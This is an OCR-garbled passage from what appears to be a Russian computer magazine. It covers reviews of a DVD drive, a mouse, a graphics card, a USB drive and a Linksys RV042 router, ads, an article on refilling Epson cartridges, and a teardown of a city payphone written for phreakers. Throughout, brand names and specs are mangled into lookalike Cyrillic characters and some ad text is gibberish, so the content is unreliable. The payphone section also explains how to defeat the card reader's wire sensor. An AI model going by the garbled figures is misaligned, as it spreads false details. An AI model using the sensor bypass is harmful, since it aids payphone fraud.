0Ѵ0+/-РѴѴ - 8х/ 6х 
0Ѵ0+/-Рі(0[_)-8х 
0Ѵ0-РАМ - 12х 
СР-Р- 48Х 

Т естоБое время записи ОѴО-К: 5:51 




1 . В целях достижения максимальной скорости привод необходимо под- 
ключать по 80-жильному кабелю для поддержки Шга ЭМАбб Мобе 4. 

Девайс способен разгонять запись обычных 1 6-скоростных дисков 
до 18х. 

3. Во время прожига тестового диска наблюдались существенные 
скачки скорости — так работает система защиты. 

4 . Чтениезаписанногодискапроизводилось ровно, и потрачено наэто 
было 5 минут, на запись ушло почти 6 минут. 

5 . С дисками 0\Ю-ВАМ привод может работать (запись/чтение) на ско- 
рости до 12х. 

6. Присутствует поддержка записи двухслойных дисков. 



Не поддерживается технология идбіЗсгіЬе. 

Во время работы привод греется средне и издает негромкий, но пос- 
^тоянный шум. Вибрация умеренная. 
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ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 
Разрешение сенсора: 800 брі 
Клавиши: 2 

Колесико прокрутки: есть 
Интерфейс: ЕІЗВ 
Размеры: 3x11x6 см 





1 . Если ты идешь на День рождения к фанату ПК и мучительно думаешь, 
что же ему подарить (вроде все, что связанно с компьютером, у него есть, 
а другого ему ничего и не надо), то подари мышку! Ну и пусть их у него уже 
десяток — хорошее начало коллекции! 

2. А модель ІЧеобгіѵе 5Р-1018 сможет легко эту коллекцию украсить. 
Собой. 

3. Потому что выглядит данное устройство довольно симпатично: молоч- 
но-белого цвета корпус, синяя прозрачная вставка по периметру, сквозь 
которую проглядывают красные огоньки сенсора. 

4 . Кроме красоты, есть 2 кнопки и колесико прокрутки, которое тоже на- 
жимается, чем обеспечивается быстрый скроллинг. 

5 . Грызун имеетдлинныйхвост.этоопределенноможетпригодитьсяв 

которых ситуациях. Заканчивается он ІІ8В-коннектором, через который 
происходит сцепка с компьютером . ^ 

6. Вообще, эта мышь небольшая и очень легкая, что дает возможность 
использовать ее в дороге с ноутбуком. Много места она не займе т и су мку 
с мобильным ПК особо не утяжелит. 



1 . Оптический сенсор имеет разрешение 800 брі, ч то со вершенно норн 
мально, работать можно. Ну а хардкорные геймеры на обычные мышки 
просто не смотрят. 








НІ5 Аа 



Сверхмощная видеокарта с умопомрачительным 
разгонным потенциалом и уникальной системой 
охлаждения 

ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

Процессор: Р580 (АТІ Рабеоп XI 900ѲТ) 

Частота СРІІ: 600 МГ ц 
Память: 256 Мб СЮЭРЗ 
Частота памяти: 1 ,2 ГГц 
Ширина шины: 256 бит 
Пиксельные конвейеры: 36 
Вершинные конвейеры: 8 
Техпроцесс: 90 нм 

ТЕСТОВЫЙ СТЕНА: 

Процессор: АМЭ Зетргоп 3000 МГ ц, 8939 
Кулер: ОІасіаІіесИ Ідіоо 7200 Рго 
Материнскаякарта: АІЬаІгоп К83І_І 
Чипсет: ІЧѴЮІА пРогсе4 8Ы 

Память: 2x512 Мб, Согзаіг Ѵаіиѳ Зеіесі Ѵ351 2МВ400 
Жесткий диск: 80 Гб, Зеадаіе ВаггасисІа7200 грт 



Ю 118В 2.0 Ргіѵе Соісіеп 



Компактный 11§В-драйв как образец стиля 
в воплощении высоких технологий 



Блок питания: Ріозіоп 450 ѴѴ 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ: 

Разгон Свез вольтмода): 71 0 МГц/ 1 495 МГц 

30 Маг к 2005 ѵ. 1 .2.0: 1 0532 

30 Магк 2006 ѵ. 1 .0.2: 4320 

Р.Е. А.Р., 1 024x768 (ААх4 + АЕх 1 6): 64 фз 

Р.Е.А.Р., 1024x768: 90 фз 

НаІГ И Ре 2, 1 024x768 (ААх4 + АРх 1 6): 81 фз 

НаІР ИРе 2, 1 024x768: 95 фз 



Овъем/ 128 Мб 
Размеры: 63x20x7 мм 
Материал: аяюминий/пяастик 
Вес: 12 г 

РЕЗУЛЬТАТЫ ТЕСТИРОВАНИЯ: 
Время доступа: 0,6 нс 
Средняя скорость чтения: 7,9 Мб/с 
Средняя скорость записи: 7,5 Мб/с 




1. Компания НІЗ порадовала своих фанатов выпуском платы НІЗ 
Рабеоп Х1900ѲТ с уникальной системой охлаждения ІСЕОЗ от Агсііс 
Сооііпд. 

2. Результаты тестов говорят о том, что устройство обладает отменной 
производительностью. 

3. Охлаждение представляет собой турбину с выбросом нагретого 
воздуха за пределы корпуса. Причем тепловая труба, радиаторы и ос- 
нование изготовлены из меди (Си). Вентилятор работает практически 
бесшумно. 

4. Комплектация карты радует - помимо стандартных переходников и 
шнурочков, в набор были включены игра РІаіоиі, СО с РоѵѵегЭѴЭ и диск 
НІЗ ЕхсаІіЬиг с различным софтом. 



1 . Совсем недавно компания І_С представила на рынке необычную 
флешку под маркой РІайпит. Тогда устройство облекалось в металли- 
ческий корпус и снабжалось подарочной упаковкой. Вслед за ней на 
рынок вышла модификация под названием Ооісіеп. 

2. Девайс поставляется в элегантном футляре. Внутри него флеш- 
ка располагается на бархатной подушечке — ну чем не подарок 1 
для девушки? 

3. Девайс снабжен очень ярким голубым индикатором работьг 1 
во время использования он будет тебе энергично «подмигивать» 

4. В комплекте ты найдешь цепочку для ношения флешки_на шее, а 
также шелковый платок для полировки корпуса. 



1 . В этой карте, как и во всех решениях с использованием чипа АТІ 
Рабеоп Х1900СТ, количество пиксельных конвейеров было сокраще- 
но с 48-ми до 36-ти. 

2. Следует отметить, что карта расходует довольно много энергии и 
выделяет много тепла (особенно при разгоне). 

3. Г ромоздкость конструкции системы охлаждения заставляет исполь- 
зовать 2 слота на корпусе, в то время как обычному АТІ Рабеоп XI 900СТ 
хватает одного. ^ 



лота, а из легкого алюминия, поэтому вес І_0 ІІЗВ 2.0 Эгіѵе Соісіеп очень ’ 
невелик — всего 12 г. 

2. Этот ІІЗВ-драйв обладает скромными по сегодняшним меркам 
объемами памяти. Однако І_С предлагает подобные девайсы с 
объемами от 128 Мб до 4 Гб. 

3. Кстати, платком для полировки тебе придется пользоваться доволь- 
но часто, поскольку флеш не стесняется оставлять на своем теле отпе-, 
чатки пальцев. 



ІезПаЬ выражает благодарность за предоставленное на тестирование оборудование компании ЫЕСЮРІѴЕ ( млл/ѵ.пеосігіѵе.ги ). российским представительствам компаний ЬО, I 
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ИГОРЬ ФЕДЮКИН 




КОМПАНИЯ ЫЫКЗУЗ ПОДСОЗНАТЕЛЬНО ПРИВЛЕКАЕТ К СЕБЕ ВНИМАНИЕ СО СТОРОНЫ ПРОДВИНУТЫХ СЕТЕВИКОВ, ЗНАКОМЫХ 
С ПРОДУКЦИЕЙ ЛЕГЕНДАРНОЙ СІ5С0 5У5ТЕМ5 ИЛИ ТОЛЬКО НАСЛЫШАННЫХ О НЕЙ. ИМЕННО ЭТОТ ЛОГОТИП КРАСУЕТСЯ НА 
ВСЕХ ДЕВАЙСАХ КОМПАНИИ ЫКІКЗУЗ. ДОСТАТОЧНО ЧАСТО ПРИХОДИТСЯ СЛЫШАТЬ, ЧТО ПОСЛЕ ИХ ОБЪЕДИНЕНИЯ В ПРОДУКТАХ 
ЫКІКЗУЗ СТАЛИ ИСПОЛЬЗОВАТЬСЯ ТЕХНОЛОГИЧЕСКИЕ НАРАБОТКИ СІ5С0 5У5ТЕМ5. ТАК ЭТО ИЛИ НЕТ, ЗНАЮТ ТОЛЬКО САМИ ИН- 
ЖЕНЕРЫ. А НАМ ОСТАЕТСЯ ДОВЕРЯТЬ, А ЛУЧШ Е - ПРОВЕРЯТЬ САМОСТОЯТЕЛЬНО. 



Технические характеристики: 

Интерфейсы: ІхѴѴАЫ (ПШ45) 10/100 Мбит/ 
сек, ІХБМ2/ѴѴАЫ (РУ-45) 10/100 Мбит/сек, 
4хІ_АЫ (РУ-45) 10/100 Мбит/сек 
Функции роутера: ЫАТ/ЫАРТ, БМ2, ОупОЫЗ, 
ЬоасІ Ваіапсе 

Функции файрволла: Ассезз Ьізіз, ЗРІ, Мае 
Ріііег, Баске! Ріііег, Сопіепі Ріііег 
Дополнительно: ѴРЫ Разз-ТИгоидб (РРТР, 
Ь2ТР, ІРЗес), РРТРЗегѵег 
Цена: $225 

нашу тестовую лабораторию 
попал роутер Ьіпкзуз ВѴ042, 
который изначально позицио- 
нируется как бескомпромис- 
сное решение для объединения удаленных 
офисов/филиалов с помощью ѴРЫ-тунне- 
лей. Учитывая принадлежность этого де- 



вайса к корпоративному классу, установ- 
ленная цена на него действительно весьма 
демократична. Мы не могли оставить без 
внимания такой продукт и решили прове- 
рить, насколько он хорош. 

□ Внешний вид 

В отличие от большинства «пластмассо- 
вого» оборудования Ьіпкзуз, этот девайс 
упакован в прочный металлический кор- 
пус. На морде находятся 9 светодиодов 
активности: индикация загрузки/режи- 

мов работы — Зузіепп, Ьіад, активнос- 
ти ѴѴАКІ-интерфейсов, режима работы 
ЬМ2 и 4 светодиода активности портов 
коммутатора. На задней панели есть 
кнопка сброса на заводские настройки, 
4 разъема ЬАКІ, разъем ѴѴАЫ и комбиниро- 
ванный порт ѴѴАЫ/0М2. Разъем для подклю- 
чения питания находится на правом боку. 



□Аппаратная начинка 

Маршрутизатор построен на базе микро- 
процессора Іпіеі РВІХР425ВВ, работаю- 
щего на частоте 266 МГц. Задействованы 
2 микросхемы оперативной памяти МІРА 
Р2Ѵ28340ВТР суммарным объемом 32 
Мб. Частота памяти составляет 166 МГц. 
Используется ЛазИ-память ІпіеІ Л328Р640 
объемом 8 Мб. Встроенный коммутатор 
представляет собой чип ІпЛпеоп АБМ6999 
с поддержкой ѴЬАІЧ и возможностью ве- 
дения двух очередей ОоЗ (с нормальным и 
высоким приоритетами). 

□ Функциональные возможности 

Настройка роутера возможна только с по- 
мощью ѵѵеЬ-интерфейса. Его дизайн весь- 
ма стандартен для оборудования марки 
Ьіпкзуз. Придется некоторое время привы- 
кать к расположению настроек, однако, в 
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Ворсив ѣгада риппгаа} 



> Полнодуплексный режим передачи при использовании обоих ѴѴАІЧ-портов. Разброс 
скорости весьма значителен, и снова видны провалы 
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> При передаче в обоих направлениях видны аномальные падения скорости. Причина 
этого явления пока остается неизвестной 



целом, они разбиты по группам достаточно 
логично. Возможностей здесь предоста- 
точно. К примеру, в настройках ЫАТ/ЫАРТ 
можно осуществлять рог! Тогѵѵагсіі пд как 
по порту 1 , так и по диапазону портов. Есть 
тут и возможность работы ЫАТ в режиме 
Опе-іо-Опе. То есть если провайдер вы- 
деляет нам пул внешних ІР- адресов, мож- 
но выставлять соответствие диапазона 
внутренних адресов диапазону внешних. 
Таким образом, пользователи внутренней 
сети будут себя чувствовать так, как будто 
ЫАТ’а и вовсе нет и у них изначально вне- 
шний ІР-адрес. Интегрированный свитч 
умеет работать с очередями ОоЗ, однако 
по умолчанию эти настройки недоступны. 
С помощью скрытого меню (ИПрѴ/Х.Х.Х.Х/ 
1ап_зеШпд.И!т) становится доступной на- 
стройка приоритетов для каждого из пор- 
тов свитча. 



Ойиаі-ѴѴАЫ 

Возможно, одной из самых интересных осо- 
бенностей этого роутераявляется наличие 
двух интерфейсов ѴѴАЫ. По умолчанию они 
работают в режиме Васкир, то есть один 
из них является основным (изначально — 
ѴѴАІМ1), а второй — запасным. Когда ѴѴАКІ1 
падает, весь трафик гонится через резер- 
вный канал. Но, скажем, в домашних усло- 
виях при наличии двух интернет-каналов 
гораздо интереснее перевести роутер в 
режим работы І_оасІ-ЬаІапсе. В таком слу- 
чае будут одновременно использоваться 
оба ѴѴАЫ-интерфейса и скорость рабо- 
ты теоретически должна увеличиться. 
По умолчанию роутер сам определяет, как 
лучше распределять нагрузку между кана- 
лами, однако мы можем вмешаться в этот 
процесс. Возможно настроить скорость 
для каждого из ирііпк’ов, а также распре- 



делить нагрузку на интерфейсы в зависи- 
мости от типа трафика и/или от ІР-адресов 
источника/получателя. 

□ Методика тестирования 

Для тестирования проводного сегмента ис- 
пользовался программный продукт ЫеШ 
СІіагіоі и скриптТІтгоидІтриіс передачей паке- 
тов максимального объема. На двух станциях 
устанавливались так называемые епброіп!- 
программы, затем в консоли ЫеЮ СІтагіо! за- 
пускался скрипт генерации трафика. 

1. При тестировании пропускной способ- 
ности ѴѴАЫ -> І_АЫ одна из станций подклю- 
чалась к одному из портов свитча (интер- 
фейс І_АІ\І), вторая — к ѴѴАЫ-порту. Так мы 
получали пиковую пропускную способность 
для ѴѴАІЧ-интерфейса (также ее можно на- 
зывать скоростью ЫАТ). Скорость тести- 
ровалась как в режиме однонаправленной 
передачи (направления І_А[\І-> ѴѴАЫ иѴѴАЫ-> 
І_АІ\І), так и в режиме полного дуплекса (Ібх). 

2 . Учитывая то, что роутер оснащен двумя 
ѴѴАІЧ-интерфейсами, также мы измерили 
пропускную способность маршрутизатора 
в случае применения обоих портов ѴѴАКІ. 
Для этого использовались 3 станции, две из 
которых подключались к ѴѴАЫ портам, тре- 
тья — к одному из І_АЫ-портов встроенного 
коммутатора. Роутер переводился в режим 
І_оасІ-ЬаІапсе. 

3. Поскольку при активации интернет-со- 
единения по протоколу РРТР создается 
дополнительная нагрузка на центральный 
процессор роутера, мы измерили про- 
пускную способность РРТР. Для этого за 
ѴѴАІМ-интерфейсом маршрутизатора был 
поднят ѴРЫ-сервер. Также проверялась 
возможность установки ѴРІ\І-соединения в 
случае, если ѴРІЧ-сервер размещается вне 
сегмента нахождения нашего маршрути- 
затора. Дополнительно проводился замер 
скорости, когда роутер выступал в качестве 
РРТР-сервера. 

4 . Так как маршрутизатор изначально 
заточен для работы с ѴРІ\І-туннелями по 
протоколу ІРЗес, мы решили измерить его 
пропускную способность при активации 
этого режима работы. Для этого мы подняли 
ІРЗес-туннель между двумя Ыпкзуз РѴ042, а 
к І_А[\І-портам каждого из них подсоединили 
рабочие станции. Использовался алгоритм 
шифрации трафика ЗЭЕЗ/ІѴЮ5. Все измере- 
ния по-прежнему проводились с помощью 
Ые!ЮСІтагіо!. 

5 . В качестве дополнительного исследо- 
вания была проведена проверка на уязви- 
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ки с сервера, трафик через РРТР-туннель не 
ходит. Причем ни в одном из направлений. 
Возможно, это является недоработкой кон- 
кретной версии прошивки, однако измерить 
пропускную способность при активации 
РРТР-соединения нам не представилось воз- 
можным. Причем сервер РРТР работает на 
ура. Только скорость оставляет желать луч- 
шего. Передача в одну сторону — 7,35 Мбит/ 
сек, в обе — 6,95 Мбит/сек. 

А вот ѴРІМ по протоколу ІРЗес работает без 
нареканий. Настройка упрощается тем, что 
сразу предлагается выбрать один из двух 
шаблонов по настройке (туннель между дву- 
мя роутерами или туннель между роутером 
и пользовательским клиентом). Пропускная 
способность ІРЗес при однонаправленной 
передаче составляет 32,21 Мбит/сек. В пол- 
ном дуплексе — 21,17 Мбит/сек. 

ТепаЫе ІМеззиз не выявил серьезных уязви- 
мостей у роутера. С полным отчетом о ска- 
нировании ты сможешь ознакомиться на 
нашем диске. 



Пропускная способность 
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> Как видно, скорость ЫАТ при однонаправленной передаче стабильно 
держится на уровне 84-89 Мбит/сек 



Мбит/сек 

> Скоростные показатели всехтипов возможных соединений. Представлены результаты 
при однонаправленной (ѴѴАЫ -> І_АІ\І) и полнодуплексной (РйХ) передачах 



мости ѴѴАІМ-интерфейса с помощью про- 
граммного продукта ТепаЫе ІМеззиз. 

□ Результаты тестов 

Пропускная способность ІМАТ в направле- 
нии ѴѴАІМ -> І_АІМ составляет 88,56 Мбит/сек. 
Значение очень близкое к максимально 
возможному для технологии Раз! ЕіИегпеі. 
Однако при полнодуплексной передаче 
скорость циклически падает. С чем это 
связано, пока не удалось выяснить, однако 
следует констатировать тот факт, что при 
одновременной передаче из ѴѴАІМ в І_АІ\І и 
наоборотпропускная способность роутера 
существенно снижается. В режиме 3!а!іс 



ІР (то есть ІМАТ опіу) она составляет 48,36 
Мбит/сек. 

Одновременное использование двух 
ѴѴАІМ-портов в режиме І_оасІ-ІэаІапсе практи- 
чески никак не изменяет картину. Процес- 
сор нормально справляется с нагрузкой. 
Скорость, судя по всему, снова упирается в 
технол огические ограничения Раз! ЕіИегпеі. 
В одном направленном режиме передаче 
(ѴѴАІМ -> І_АІМ) — 87,66 Мбит/сек. При полном 
дуплексе — 56,36 Мбит/сек. 

Тестирование РРТР-клиента выявило 
достаточно странную его реализацию. 
РІесмотря на то, что соединение происходит 
и роутер получает ІР-адрес и прочие настрой- 



13 Выводы 

В целом Ыпкзуз РѴ042 производит хоро- 
шее впечатление. Из недостатков мож- 
но отметить посредственную работу с 
соединениями по протоколу РРТР и ано- 
мальное падение скорости при полно- 
дуплексной передаче через ѴѴАІМ-порт(ы). 
Из достоинств — широкие возможности 
по настройке ЫАТ и функций фильтрации, 
наличие двух ѴѴАІМ-портов и возможность 
их использования в режиме распределе- 
ния нагрузки, высокую скорость марш- 
рутизации ІМАТ и ІРЗес. Маршрутизатор, 
несомненно, станет хорошим выбором для 
объединения подсетей посредством ѴРІМ- 
туннелей ІРЗес, а также, возможно, будет 
интересным вариантом для обладателей 
двух интернет-каналов для распределе- 
ния нагрузки между ними. ПЕ 



ІезШаЬ выражает благодарность за предоставленное на тестирование оборудование компании Аѵісоп (т.(495) 788-3184, ѵѵѵѵѵѵ.аѵісоп.ги ). 
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Прорыв года! 

Компьютер марки <ІЧТ> АсІѵаМТ АСЕ 
на базе процессора ІпіеГ Соге™ 2 Оио. 




ІпіеІ®Соге™2 Оио 

Процессор, опередивший время 

На 40% быстрее, на 40% экономичнее 



Компьютеры марки <КТ> можно приобрести в 
Федеральной сети компьютерных центров Р0І-АКІ5 
и у наших региональных дилеров: тжѵу.лі.пі 
тел.: (495) 363 9393 



сотриіег 



* П роизвадліеі'ьнміь івИ№ЛйАзс:ь с гюмотыо эгалончдо тестя гчиизтдотаАычмяи 5ге.СМ*_гаІе_Ьа*е2000 12 лдоиіылраі, 
а Зншрголсйрейдйиис ПО анпчинмй ІёіШЩыдшіаммй (ТЬитщІ Скді^п Рйа*С, ТОР). Срйймніыіхміі ІирСщррс^ 0»*^ 2 Оий №700 

И Шѵ \ * Ррп1шгп*0 960 ЦрСИЗ&аііЩ’Л^іОСТѴ РМЛЫНОЙ ЕИЕТВМЫ ЧГСЧОТ О^кчагьсо, ДйГЩЛНИірЛЬИѴЧ информацию М0ИН5 поучить 



іпБІде 



Два ядра. 
Делай больше 



На правах рекламы 
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О ТОМ, ПОЧЕМУ ВРЕДНО ЗАПРАВЛЯТЬ 
КАРТРИДЖИ ЕР50Ы 



КАК ИЗВЕСТНО, ЕСТЬ ВСЕГО ДВЕ ТЕХНОЛОГИИ СТРУЙНОЙ 
ПЕЧАТИ, КОТОРЫЕ ИСПОЛЬЗУЮТСЯ В СОВРЕМЕННЫХ ПРИ- 
НТЕРАХ: ТЕРМОСТРУЙНАЯ И ПЬЕЗОЭЛЕКТРИЧЕСКАЯ. РАЗУ- 
МЕЕТСЯ, У КАЖДОЙ ТЕХНОЛОГИИ ЕСТЬ СВОИ ПЛЮСЫ И МИ- 
НУСЫ, КОТОРЫЕ ОБУСЛОВЛЕНЫ ФИЗИЧЕСКИМ ЭФФЕКТОМ, 
ПРИ ПОМОЩИ КОТОРОГО РЕАЛИЗУЕТСЯ ПЕЧАТЬ. СЕГОДНЯ 
Я РАССКАЖУТЕБЕОБОБЕИХТЕХНОЛОГИЯХИ О ТОМ, В ЧЕМ 
ЗАКЛЮЧАЕТСЯ РАЗНИЦА МЕЖДУ НИМИ ДЛЯ НАС С ТОБОЙ 
— ПОТРЕБИТЕЛЕЙ. 



стория струйной печати уходит 
в глубь веков. Еще в 1833 году 
француз Феликс Саварт в своих 
опытах заметил однотипность об- 
разования капель жидкости, «выстреливае- 
мых» изузкихотверстий. Математическоеопи- 
сание этого процесса появилось в 1878 году. 
Его написал лорд Рейли, который впоследс- 
твии получил Нобелевскую премию. Однако 
первое устройство, использующее струйную 
печать, появилось только в 1951 году. Патент 
на него получила компания Зіетепз. Спустя 
20 лет компания ІВМ лицензировала техно- 
логию струйной печати и начала внедрять ее 
в собственных принтерах, а в 1976 году она 
выпустила первый принтер, который назвали 
«Периферийное устройство печати текста на 
твердых носителях». 

□ Технологии печати 

На сегодняшний день существуют два раз- 
личных метода струйной печати: пьезоэлект- 
рический и метод «газовых пузырей». Первый 
основан на использовании пьезокристалла, 
который, как известно, деформируется при 
воздействии на него электрическим полем. 
Пьезокерамический элемент установлен на 
каждом из капилляров, идущих к соплам, таким 
образом, что при его деформациях меняется 
объем капилляра. Колебания пьезоэлемента 
передаются на особую пластину (диафрагму), 
которая выталкивает чернила через сопла пе- 
чатающей головки на поверхность носителя. 
Отсутствие нагревания (в отличие от термос- 
труйной технологии печати) увеличивает ре- 
сурс печатающей головки и позволяет исполь- 
зовать различные типы чернил. 



При использовании метода газовых пузырей 
каждое из сопел оборудовано нагреватель- 
ным элементом, способным очень быстро 
нагреться до температуры порядка 550 гра- 
дусов по Цельсию. При нагревании чернил, те 
испаряются, и получаемый газ занимает зна- 
чительно больший объем, нежели занимала 
жидкость, в результате чего из сопла выталки- 
вается порция чернил, оставляющая на бума- 
ге точку. После отключения нагревательного 
элемента, газ быстро конденсируется, умень- 
шаясь в объеме и втягивая в капилляр новую 
порцию чернил. Сейчас широко распростра- 
нены цветные струйные принтеры. Они, имея 
довольно низкую стоимость, позволяют печа- 
тать цветные изображения фотографическо- 
го качества. В этом случае различные цвета 
получаются путем смешивания желтой, зеле- 
ной, красной и черной красок. Струйные при- 
нтеры преимущественно используются там, 
где нет необходимости в больших объемах 
печати, зато предъявляются высокие требо- 
вания к ее качеству. 

□ Стационарная головка 

Принципиальное отличие технологий для 
потребителей заключается в том, что при 
использовании термоструйной техноло- 
гии печатающая головка выступает в роли 
«расходного материала». Со временем она 
довольно быстро выходит из строя, и ее 
просто меняют вместе с картриджем, так как 
она в большинстве случаев интегрирована 
в него. В случае же пьезоэлектрической 
печати используется так называемая стаци- 
онарная головка, которая монтируется на 
принтере и не является расходником. Она 



не дешевая, и постоянно менять ее нет смысла, 
поскольку она очень надежная и может долго 
прослужить, если правильно с ней обращаться. 
Исторически сложилось, что пьезоэлектри- 
ческую технологию используют принтеры 
Ерзоп, и сейчас применяет головку Ерзоп 
МісгоРіего, которая обеспечивает очень вы- 
сокое качество печати. 

□ Почему нельзя заправлять 

Сэкономить и, не покупая новый картридж, 
просто залить в него новые чернила — по пер- 
вым ощущениям хорошая идея. В самом деле, 
зачем покупать новый картридж, если можно 
в любом магазине купить баклажку чернил, 
шприц в аптеке и заправлять свой картридж, 
сколько влезет? 

Ответ тут очень простой. Дело в том, что 
при производстве картриджей используется 
сложное высокотехнологичное оборудование 
и специальные, почти стерильные, помещения. 
При использовании пьезоэлектрической тех- 
нологии довольно дорогая печатающая голо- 
вка очень чувствительна к любой пыли, грязи 
и даже мельчайшим частицам. Не говоря уже 
о качестве чернил: совершенно понятно, что 
на заводе Ерзоп их подбирают специальным 
образом, чтобы они на 100% подходили к пе- 
чатающей головке. Заправляя в кустарных 
условиях шприцем свой картридж, ты вводишь 
в него огромное количество чужеродныхчастиц, 
которые сразу же ухудшают качество печати 
и портят головку. Так что на деле экономия мо- 
жет обернуться убытками — ты просто запо- 
решь печатную головку некачественными чер- 
нилами, и придется уже не менять картридж, 
а ремонтировать принтер. Ш 
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» Максимальная мощность аккумуляторов 
йигасеІІАА - 2500 тАЬ 

» Аккумуляторы йигасеИ Зиргете созданы для 
бесперебойной работы в современных 
цифровых устройствах с высоким 
энергопотреблением 
'До 4 раз больше фотографий* 

'До 1000 циклов перезарядки 
' Отсутствие эффекта памяти 



ОУПАСЕИ 

5УРПЕМЕ 



Ш'сггтіту,тіш дагаші 






а Ітка 



раз больше 

* по сравнению с обычными щелочными батарейками - зависит от типа камеры и использования 



целый 



Товар сертифицирован Реклама 
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ВЕРОЯТНО, КАЖДЫЙ фрикер, от начинающего до опытного, мечта- 
ет ЗАГЛЯНУТЬ ВНУТРЬ ТАКСОФОНА. И НЕ ПРОСТО ЗАГЛЯНУТЬ, А ЧТОБЫ ЕМУ 
ЕЩЕ И РАССКАЗАЛИ О ТОМ, ДЛЯ ЧЕГО КАКАЯ ЖЕЛЕЗКА НУЖНА, О ТОНКОСТЯХ 
СИСТЕМЫ ЗАЩИТЫ. ЗАДАЧА ПОЧТИ НЕРАЗРЕШИМАЯ. ВОЗМОЖНО, КОНЕЧНО, 
УПЕРЕТЬ ТАКСОФОН, НО РАЗОБРАТЬСЯ, КАК ОН ФУНКЦИОНИРУЕТ ВЕСЬМА 
СЛОЖНО. ТЕЛЕФОННАЯ КОМПАНИЯ МГТС ПРЕДОСТАВИЛА НАМ ТАКУЮ ВОЗ- 
МОЖНОСТЬ И ПОДРОБНО ПРОКОНСУЛЬТИРОВАЛА НАС НА ПРЕДМЕТ ТОГО, КАК 
ЖЕ ОН РАБОТАЕТ. СЕЙЧАС МЫ РАЗВЕНЧАЕМ МНОГИЕ СЛУХИ ИЛИ, НАОБОРОТ, 
ПОДТВЕРДИМ НЕКОТОРЫЕ ИЗ НИХ. 




1 .КОДОВЫЙ ЗАМОК 

Используется для 
открытия таксофона 



2.3АМОК ИНКАССАЦИИ 

Открывает кассу для выгре- 
бания дядей мелочи 



З.ПРОВОД ПОДКЛЮЧЕНИЯ 
КАРДРИДЕРА 

Подрубает ридер к матплате 



4. ОТВЕРСТИЕ 
ДЛЯ МОНЕТ 

Сюда кидается денежка 



г " 

5. ОТСЕК ВОЗВРАТА 
МОНЕТ 

Сюда падает сдача монет 
или левые монеты 



6. ЕМКОСТЬ ИНКАССАЦИИ 

Используется для хранения полу- 
ченныхденег 



7. ШЛЕЙФ подключения 

линии 

Нужен для связи с АТС 



/озо 
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> Модемный отсек 



> Микросхема 
криптозащиты 



> Вскрываемый объект 



031 



МОДЕМ 

В каждом московском таксофоне 
стоит модем, который вечером или при 
открытии связывается с АТС. В модеме 
используется микросхема 73М2921 , 
обеспечивающая скорость обмена до 
9600 кбод/сек. Над модемом находится 
плата коммутации с линией. Обычно это 
просто плата согласования с линией, 
однако, если нет возможности подвести 
к таксофону телефонную линию, вполне 
может стоять и ОЗМ-модем. 



ПОДОПЫТНЫЙ КРОЛИК 

Рядовой таксофон, стоящий во многих 
городах, оказывается, не так прост, 
как кажется. Это в некотором смысле 
полноценный компьютер, в котором ре- 
ализованы все антифрикерские и анти- 
вандальные достижения технического 
прогресса: ударопрочный корпус; литой 
картоприемник, который достаточно 
сложно сломать; различные системы за- 
щиты от вскрытия, как программные, так 
и аппаратные. Для вскрытия таксофона 
справа у него есть кодовый замок, код 
которого для каждого таксофона свой. 
Таксофон регистрирует проникновение 
встроенными датчиками открытия и 
отзванивается на АТС, сообщая о нем. 
При этом монтеры должны набрать 
на клавиатуре таксофона секретный 
пароль, который и скажет АТС о том, что 
он был вскрыт санкционировано. Если 
это не будет сделано, автоматика вызо- 
вет на место наряд милиции и человек, 
посягнувший на таксофон, будет задер- 
жан. Аналогично работает и монетопри- 
емник, отличие состоит лишь в том, что 
вместо кодового замка используется 
обычный замок под ключ. 



КАРТОПРИЕМНИК 

Предмет множества слухов во фрикер- 
ских кругах — это картоприемник. Из 
слухов подтвердилось лишь то, что су- 
ществует датчик выводимых проводов, 
который легко обходится, если припаять 
микросхему эмулятора непосредствен- 
но на контактные площадки таксофон- 
ной карточки. Других систем распозна- 
вания эмулятора у картоприемника нет. 

1 . Емкостной датчик проводов 

2. Считывающие контакты 



> Кардридер 



КРИПТОГРАФИЯ 

Все системы защиты в таксофоне по си- 
лам обойти даже начинающему фрикеру, 
кроме одной — встроенной криптозащи- 
ты. В таксофоне имеется ключ криптог- 
рафии, по которому идентифицируется 
таксофонная карточка. Путем прямой 
эмуляции таксофонной карточки обойти 
это место защиты практически нереаль- 
но. На этом этапе обламываются все 
эмуляторы, сделанные по описанным в 
интернете хакерским правилам. 
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Внутренности лицевой части 



2.РАЗЪЕМ 

КЛАВИАТУРЫ 

В него вставляется шлейф 
от клавы 



1. КРИПТОКЛЮЧ 

С его помощью проверяют, 
настоящая ли карточка 



3. КАРТОПРИЕМНИК 

Место засовывания 
карточки 



4. КОММУНИКАЦИОННАЯ 
ПЛАТА ДЛЯ СВЯЗИ С 
ТЕЛЕФОННОЙ СЕТЬЮ 

Связывает таксофон с АТС. 
Может стоять ОЗМ модем 



5. РАЗЪЕМ ДИСПЛЕЯ 

К нему коннектится ЖК 
дисплейчик 



6. МИКРОСХЕМ А 
ВСТРОЕННЫХ ЧАСОВ 

Внутренний таймер, по нему 
сверяется дата карточки и 
время звонка на АТС 



ЦЕНТРАЛЬНЫЙ ПРОЦЕССОР 

Основу таксофона составляет цент- 
ральный процессор Р51ХАОЗОКРА. Это 
16-разрядный процессор, способный 
адресовать до одного мегабайта про- 
граммной памяти, клон самой распро- 
страненной архитектуры С51 . Ранние 
версии такософонов тоже делались на 
С51 -архитектуре младших моделей. Про- 
должение традиции скорее всего свя- 
зано с переносимостью кодов, дающей 
возможность не переписывать заново 
прошивку к каждому таксофону. 

> Процессор 
Р51ХА03ОКРА 




7. ПРОЦЕССОР 

Мозг таксофона 



9. ОПИСАНИЕ РАСПОЛОЖЕНИЯ 
ЭЛЕМЕНТОВ 

Схема расположения разъемов, 
микросхем и т.д. 



8. ДАТЧИК ОТКРЫТИЯ 
ТАКСОФОНА 

Если с приятелем открешь 
таксофон, то придёт дядя 
и накостыляет 



ІШт 
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Недра основного корпуса 



1. КОНТРОЛЛЕР 
МОНЕТОПРИЕМНИКА 

Детектирует, какая 
денежка упала 



Г ^ 

4. ПРЕДВАРИТЕЛЬНОЕ 
ХРАНИЛИЩЕ МОНЕТ 

Сначала монеты попадают 
в предварительное храни- 
лище, потом ссыпаются в 
инкассатор 



2. ЗВУКОВОЙ КОНТРОЛЛЕР 
